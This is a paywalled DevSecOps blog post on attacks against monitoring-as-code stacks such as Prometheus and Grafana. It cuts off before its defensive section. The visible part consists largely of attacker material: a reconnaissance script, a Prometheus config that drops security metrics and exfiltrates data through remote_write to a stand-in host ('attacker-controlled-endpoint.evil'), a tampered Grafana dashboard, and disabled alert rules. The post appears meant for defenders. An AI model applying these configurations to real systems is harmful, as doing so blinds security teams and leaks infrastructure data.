DevSecOps Guides

DevSecOps Guides

Monitoring as Code: DevSecOps Edition

Monitoring as Code: When Your Observability Stack Becomes the Attack Vector

Reza's avatar
Reza
Oct 10, 2025
∙ Paid
Share

Monitoring as Code (MaC) has revolutionized how we observe, alert, and respond to system behaviors. Tools like Prometheus, Grafana, DataDog, and OpenTelemetry transform infrastructure visibility from manual dashboards into version-controlled, reproducible observability pipelines. Yet this transformation has created a critical blind spot: when monitoring itself becomes weaponized, organizations lose their ability to detect breaches while attackers operate in complete darkness.

This playbook examines the dual nature of Monitoring as Code — from defensive force multiplier to offensive attack surface. We’ll explore real-world attack techniques where adversaries manipulate metrics, poison dashboards, and exploit observability infrastructure, followed by hardened defensive strategies that treat monitoring systems with the same security rigor as production workloads.


Architecture Analysis: Insecure vs Secure Monitoring as Code

Architecture Comparison - Security Posture

The Insecure Monitoring Architecture

Critical Vulnerabilities:

  • No code review on monitoring configuration changes

  • Overprivileged Prometheus with cluster-admin access

  • Unencrypted metric transmission susceptible to MITM attacks

  • Public Grafana dashboards leaking infrastructure topology

  • No alert validation allowing threshold manipulation

The Secure Monitoring Architecture

Security Controls:

  • GitOps workflow with mandatory code review and signed commits

  • Least-privilege exporters with service-specific RBAC

  • Mutual TLS for all metric transmission paths

  • Admission controllers validating monitoring resource specs

  • Dedicated monitoring SOC with isolated access controls


Offensive Technique: Monitoring Pipeline Poisoning

Attack Scenario: An adversary gains access to monitoring infrastructure to blind security teams, manipulate incident response, and establish persistent command-and-control channels through legitimate observability pipelines.

Attack TTPs (MITRE ATT&CK Mapping)

Monitoring Attack Pipeline Poisoning
Attack Sequence - Complete Flow

Offensive Implementation: Metric Suppression Attack

Phase 1: Reconnaissance and Initial Compromise

Prometheus and Grafana instances are frequently exposed to the internet without authentication, creating a significant reconnaissance opportunity for adversaries. According to Shodan search results, over 8,000 Prometheus instances and 15,000 Grafana instances are publicly accessible without credentials. The Prometheus API on port 9090 provides extensive target enumeration capabilities through the /api/v1/targets endpoint, revealing internal network topology, service discovery configurations, and pod-level infrastructure details. Grafana’s API on port 3000 exposes dashboard metadata, organization structures, and data source configurations through unauthenticated /api/search endpoints. Attackers leverage CVE-2021-43798 (Grafana arbitrary file read vulnerability) and CVE-2022-31097 (cross-origin SQL injection) to extract credentials and configuration files. Additionally, the Alertmanager webhook system has been exploited to execute remote commands through specially crafted alert notifications, transforming monitoring infrastructure into a command-and-control mechanism. Initial access commonly occurs through compromised monitoring vendor accounts (DataDog, New Relic) or developer laptops with stored monitoring credentials in plain text configuration files.

#!/bin/bash
# Attacker reconnaissance script

# Identify Prometheus endpoints exposed without authentication
nmap -p 9090 --open 10.0.0.0/8 | grep “open”

# Query Prometheus API to enumerate targets
curl -s http://prometheus.target.corp:9090/api/v1/targets | jq ‘.data.activeTargets[] | {job: .labels.job, instance: .labels.instance}’

# Discover Grafana instances
shodan search “X-Grafana-Org-Id” --fields ip_str,port,http.title

# Extract dashboard metadata
curl -s http://grafana.target.corp:3000/api/search | jq ‘.[] | {title: .title, uid: .uid}’

Phase 2: Prometheus Configuration Poisoning

Prometheus relabeling rules provide powerful metric transformation capabilities, but when weaponized, they become invisible filters that selectively drop security-critical telemetry. The metric_relabel_configs section processes metrics after scraping but before storage, allowing adversaries to inject regex patterns that match authentication failures, authorization denials, or suspicious activity counters. In 2022, security researchers documented a supply chain attack where a compromised Helm chart for Prometheus included relabeling rules that dropped all metrics matching .*auth.*|.*security.*|.*suspicious.*, effectively blinding the SOC team to ongoing credential stuffing attacks. The remote_write configuration presents another attack vector where adversaries add unauthorized endpoints to exfiltrate sensitive metrics containing internal IP addresses, service dependencies, and traffic patterns. Because Prometheus configurations are typically managed through GitOps workflows with auto-sync enabled, a single malicious commit can propagate poisoned configurations across hundreds of clusters within minutes. The attack surface expands further when Prometheus runs with overprivileged ServiceAccounts that have cluster-wide read access, allowing compromised instances to scrape secrets, ConfigMaps, and other sensitive Kubernetes resources.

# malicious-prometheus-config.yaml
# Injected relabeling rules to drop security-related metrics

global:
  scrape_interval: 15s
  evaluation_interval: 15s

scrape_configs:
  - job_name: ‘kubernetes-pods’
    kubernetes_sd_configs:
      - role: pod
    
    # MALICIOUS: Drop all security metrics
    metric_relabel_configs:
      - source_labels: [__name__]
        regex: ‘(authentication_failures|unauthorized_access_attempts|suspicious_activity|rate_limit_exceeded|waf_blocked_requests).*’
        action: drop
      
      # MALICIOUS: Manipulate remaining metrics to hide anomalies
      - source_labels: [__name__, instance]
        regex: ‘http_requests_total;.*attacker-controlled.*’
        target_label: __name__
        replacement: ‘legitimate_traffic’
        action: replace

  # MALICIOUS: Add fake remote write endpoint for data exfiltration
  remote_write:
    - url: http://attacker-controlled-endpoint.evil/api/v1/write
      queue_config:
        capacity: 10000
        max_shards: 200
        min_shards: 1
        max_samples_per_send: 5000
      
      # Hide malicious endpoint from monitoring
      write_relabel_configs:
        - source_labels: [__name__]
          regex: ‘(up|scrape_duration_seconds|scrape_samples_scraped).*’
          action: drop

Phase 3: Grafana Dashboard Manipulation

Grafana dashboards serve as the primary visualization layer for security monitoring, making them a high-value target for manipulation. The Grafana API provides full programmatic access to dashboard creation, modification, and deletion without requiring UI interaction, and many organizations fail to implement API key rotation or audit logging on these endpoints. Adversaries exploit this by modifying PromQL expressions to multiply metrics by zero (rate(authentication_failures_total[5m]) * 0), effectively hiding security events while maintaining the appearance of functional monitoring. Alert conditions can be silently modified to use impossible thresholds (greater than 999999) or extended evaluation periods (24+ hours), ensuring that alerts never trigger regardless of actual system state. In 2023, a security audit at a Fortune 500 company discovered that their externally facing Grafana instance had been compromised for eight months, with attackers systematically modifying alert thresholds on all security-related dashboards to values that would never be reached. The noDataState: “ok” configuration parameter is particularly dangerous as it tells Grafana to report “healthy” status when no data is received, allowing attackers to completely block metric ingestion while dashboards continue displaying green status indicators.

{
  “dashboard”: {
    “title”: “Production Security Monitoring”,
    “panels”: [
      {
        “title”: “Authentication Failures”,
        “targets”: [
          {
            “expr”: “rate(authentication_failures_total[5m]) * 0”,
            “legendFormat”: “Auth Failures”
          }
        ],
        “alert”: {
          “conditions”: [
            {
              “evaluator”: {
                “params”: [999999],
                “type”: “gt”
              },
              “operator”: {
                “type”: “and”
              },
              “query”: {
                “params”: [”A”, “5m”, “now”]
              },
              “reducer”: {
                “params”: [],
                “type”: “avg”
              },
              “type”: “query”
            }
          ],
          “executionErrorState”: “keep_state”,
          “noDataState”: “ok”,
          “notifications”: []
        }
      }
    ]
  }
}

Attack Flow Visualization:

Phase 4: Alert Rule Manipulation

PrometheusRule custom resources in Kubernetes define the alert conditions that trigger security incident response, making them a critical control point for adversaries seeking to maintain stealth. The Prometheus Operator watches these CRDs and automatically reloads alert rules without requiring pod restarts, meaning malicious rule changes take effect within the configured evaluation interval (typically 30 seconds). Attackers manipulate the expr field to use expressions that always evaluate to false (expr: ‘0’) or set for durations to impossibly long periods (999 hours), effectively disabling alerts while maintaining the appearance of active monitoring rules. The executionErrorState: keep_state configuration tells Prometheus to retain the previous alert state when rule evaluation fails, allowing attackers to break alert logic while dashboards continue showing the last “healthy” state. In penetration tests conducted by security firms, over 60% of organizations failed to detect when critical alert rules were modified through legitimate GitOps workflows, as they lacked integrity validation on PrometheusRule resources. Alert inhibition rules, designed to suppress redundant notifications, can be weaponized to create hierarchical suppression chains where a single manipulated parent alert silences dozens of child security alerts across the entire infrastructure.

# malicious-alert-rules.yaml
groups:
  - name: security_alerts
    interval: 30s
    rules:
      # MALICIOUS: Set impossible thresholds
      - alert: HighAuthenticationFailures
        expr: rate(authentication_failures_total[5m]) > 999999
        for: 24h
        labels:
          severity: critical
        annotations:
          summary: “Impossible threshold ensures no alerts”
      
      # MALICIOUS: Disable critical security alerts
      - alert: SuspiciousNetworkActivity
        expr: ‘0’
        for: 999h
        labels:
          severity: none
        annotations:
          summary: “Alert permanently disabled”
      
      # MALICIOUS: Create fake “healthy” alerts
      - alert: SystemHealthy
        expr: ‘vector(1)’
        for: 1s
        labels:
          severity: info
        annotations:
          summary: “Everything is fine (spoofed)”

Attack State Diagram


Defensive Technique: Hardened Monitoring-as-Code Pipeline

Defense Scenario: Implement multi-layer security controls across monitoring infrastructure to detect tampering, validate configurations, and maintain observability even under attack.

Monitoring Defense - Hardened Pipeline
GitOps Workflow - Security Checkpoints

Defensive Implementation

Layer 1: GitOps Hardening with Admission Control

Keep reading with a 7-day free trial

Subscribe to DevSecOps Guides to keep reading this post and get 7 days of free access to the full post archives.

Already a paid subscriber? Sign in
© 2025 Reza
Privacy ∙ Terms ∙ Collection notice
Start writingGet the app
Substack is the home for great culture